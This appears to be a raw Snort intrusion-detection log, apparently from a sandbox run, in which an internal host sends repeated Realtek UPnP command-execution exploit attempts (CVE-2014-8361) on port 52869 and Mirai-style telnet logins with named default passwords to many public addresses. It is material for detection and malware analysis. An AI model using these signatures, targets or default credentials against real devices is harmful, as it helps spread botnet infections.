    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55736 -> 185.81.200.98:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54348 -> 45.122.139.4:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54348 -> 45.122.139.4:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34354 -> 45.113.160.171:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45992 -> 45.122.134.11:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45992 -> 45.122.134.11:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58258 -> 45.133.119.24:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58258 -> 45.133.119.24:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43682 -> 91.79.14.106:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43682 -> 91.79.14.106:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43686 -> 91.79.14.106:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58444 -> 91.78.22.69:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58444 -> 91.78.22.69:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33574 -> 45.42.85.243:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33574 -> 45.42.85.243:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58446 -> 91.78.22.69:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45570 -> 91.78.22.166:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45570 -> 91.78.22.166:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45618 -> 91.78.22.166:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41524 -> 45.195.154.145:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41524 -> 45.195.154.145:52869
    Source: TrafficSnort IDS: 716 INFO TELNET access 211.129.155.129:23 -> 192.168.2.23:53662
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56690 -> 45.86.226.77:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56690 -> 45.86.226.77:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56698 -> 45.86.226.77:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45166 -> 45.113.3.113:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45166 -> 45.113.3.113:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44124 -> 45.33.248.71:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44124 -> 45.33.248.71:52869
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 41.110.216.95:23 -> 192.168.2.23:42260
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56924 -> 185.229.200.210:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56924 -> 185.229.200.210:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52384 -> 185.225.194.138:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52384 -> 185.225.194.138:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56938 -> 185.229.200.210:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52402 -> 185.225.194.138:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43960 -> 45.43.231.142:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43960 -> 45.43.231.142:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55372 -> 45.158.22.145:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:55372 -> 45.158.22.145:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39072 -> 91.76.198.218:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39072 -> 91.76.198.218:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39156 -> 91.76.198.218:52869
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 14.166.214.174:23 -> 192.168.2.23:42480
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 14.166.214.174:23 -> 192.168.2.23:42480
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60374 -> 45.138.70.254:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60374 -> 45.138.70.254:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55344 -> 45.158.20.246:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:55344 -> 45.158.20.246:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43552 -> 45.41.88.10:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43552 -> 45.41.88.10:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37874 -> 45.138.71.133:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37874 -> 45.138.71.133:52869
    Source: TrafficSnort IDS: 716 INFO TELNET access 211.129.155.129:23 -> 192.168.2.23:53926
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 114.142.252.198:23 -> 192.168.2.23:41112
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 114.142.252.198:23 -> 192.168.2.23:41112
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60782 -> 91.208.8.183:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60782 -> 91.208.8.183:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60784 -> 91.208.8.183:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35556 -> 91.78.50.172:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35556 -> 91.78.50.172:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35558 -> 91.78.50.172:52869
    Source: TrafficSnort IDS: 404 ICMP Destination Unreachable Protocol Unreachable 185.40.201.233: -> 192.168.2.23:
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38946 -> 91.78.115.84:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38946 -> 91.78.115.84:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38950 -> 91.78.115.84:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38872 -> 45.33.247.241:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38872 -> 45.33.247.241:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50254 -> 45.113.2.31:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:50254 -> 45.113.2.31:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46702 -> 45.120.78.43:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46702 -> 45.120.78.43:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50266 -> 45.113.2.31:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46714 -> 45.120.78.43:52869
    Source: TrafficSnort IDS: 716 INFO TELNET access 211.129.155.129:23 -> 192.168.2.23:54034
    Source: TrafficSnort IDS: 404 ICMP Destination Unreachable Protocol Unreachable 91.139.192.229: -> 192.168.2.23:
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43908 -> 45.42.91.125:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43908 -> 45.42.91.125:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44466 -> 185.131.77.235:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44466 -> 185.131.77.235:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44474 -> 185.131.77.235:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40540 -> 45.115.237.249:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40540 -> 45.115.237.249:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33034 -> 45.126.231.144:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33034 -> 45.126.231.144:52869
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 185.251.209.198:23 -> 192.168.2.23:36866
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 41.110.216.95:23 -> 192.168.2.23:42492
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 114.142.252.198:23 -> 192.168.2.23:41336
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 114.142.252.198:23 -> 192.168.2.23:41336
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44772 -> 45.43.238.249:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44772 -> 45.43.238.249:52869
    Source: TrafficSnort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:39368 -> 201.151.136.153:23
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41582 -> 185.221.85.26:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41582 -> 185.221.85.26:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41656 -> 185.221.85.26:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53190 -> 45.41.86.201:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53190 -> 45.41.86.201:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51670 -> 45.248.69.244:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:51670 -> 45.248.69.244:52869
    Source: TrafficSnort IDS: 716 INFO TELNET access 211.129.155.129:23 -> 192.168.2.23:54180
    Source: TrafficSnort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:49860 -> 89.137.238.249:23
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40452 -> 185.235.182.72:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40452 -> 185.235.182.72:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40456 -> 185.235.182.72:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43922 -> 45.43.225.190:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43922 -> 45.43.225.190:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46400 -> 91.78.152.18:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46400 -> 91.78.152.18:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46410 -> 91.78.152.18:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37164 -> 45.43.233.86:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37164 -> 45.43.233.86:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36206 -> 45.158.21.85:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36206 -> 45.158.21.85:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48740 -> 91.77.194.93:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48740 -> 91.77.194.93:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48746 -> 91.77.194.93:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:55164 -> 91.200.120.143:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46242 -> 185.65.162.110:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46242 -> 185.65.162.110:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46246 -> 185.65.162.110:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43776 -> 91.78.51.239:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43776 -> 91.78.51.239:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55454 -> 185.182.49.240:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:55454 -> 185.182.49.240:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43838 -> 91.78.51.239:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33802 -> 91.134.128.118:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33802 -> 91.134.128.118:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42420 -> 45.115.239.20:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42420 -> 45.115.239.20:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33806 -> 91.134.128.118:52869
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 89.137.238.249:23 -> 192.168.2.23:49860
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 89.137.238.249:23 -> 192.168.2.23:49860
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42506 -> 45.115.239.20:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38106 -> 91.200.123.28:52869
    Source: TrafficSnort IDS: 2023452 ET TROJAN Possible Linux.Mirai Login Attempt (Zte521) 192.168.2.23:39696 -> 93.212.52.114:23
    Source: TrafficSnort IDS: 716 INFO TELNET access 211.129.155.129:23 -> 192.168.2.23:54392
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54758 -> 185.71.64.186:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54758 -> 185.71.64.186:52869
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 114.142.252.198:23 -> 192.168.2.23:41526
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 114.142.252.198:23 -> 192.168.2.23:41526
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54814 -> 185.71.64.186:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60736 -> 185.241.253.31:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60736 -> 185.241.253.31:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60786 -> 185.241.253.31:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38694 -> 45.115.241.89:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54758 -> 45.115.230.171:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54758 -> 45.115.230.171:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39662 -> 185.229.200.102:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39662 -> 185.229.200.102:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39664 -> 185.229.200.102:52869
    Source: TrafficSnort IDS: 2023333 ET TROJAN Linux.Mirai Login Attempt (xc3511) 192.168.2.23:39884 -> 93.212.52.114:23
    Source: TrafficSnort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:39884 -> 93.212.52.114:23
    Source: TrafficSnort IDS: 2023333 ET TROJAN Linux.Mirai Login Attempt (xc3511) 192.168.2.23:43102 -> 41.110.216.95:23
    Source: TrafficSnort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:43102 -> 41.110.216.95:23
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 41.110.216.95:23 -> 192.168.2.23:43102
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49384 -> 185.235.183.29:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49384 -> 185.235.183.29:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49386 -> 185.235.183.29:52869
    Source: TrafficSnort IDS: 716 INFO TELNET access 211.129.155.129:23 -> 192.168.2.23:54620
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42626 -> 45.43.228.9:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42626 -> 45.43.228.9:52869
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 14.189.168.234:23 -> 192.168.2.23:38168
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 14.189.168.234:23 -> 192.168.2.23:38168
    Source: TrafficSnort IDS: 2023452 ET TROJAN Possible Linux.Mirai Login Attempt (Zte521) 192.168.2.23:39964 -> 93.212.52.114:23
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44258 -> 91.208.8.50:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44258 -> 91.208.8.50:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44292 -> 91.208.8.50:52869
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 114.142.252.198:23 -> 192.168.2.23:41890
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 114.142.252.198:23 -> 192.168.2.23:41890
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48942 -> 45.125.110.122:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48942 -> 45.125.110.122:52869
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 14.189.168.234:23 -> 192.168.2.23:38178
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 14.189.168.234:23 -> 192.168.2.23:38178
    Source: TrafficSnort IDS: 2023452 ET TROJAN Possible Linux.Mirai Login Attempt (Zte521) 192.168.2.23:40030 -> 93.212.52.114:23
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44336 -> 91.78.148.148:52869
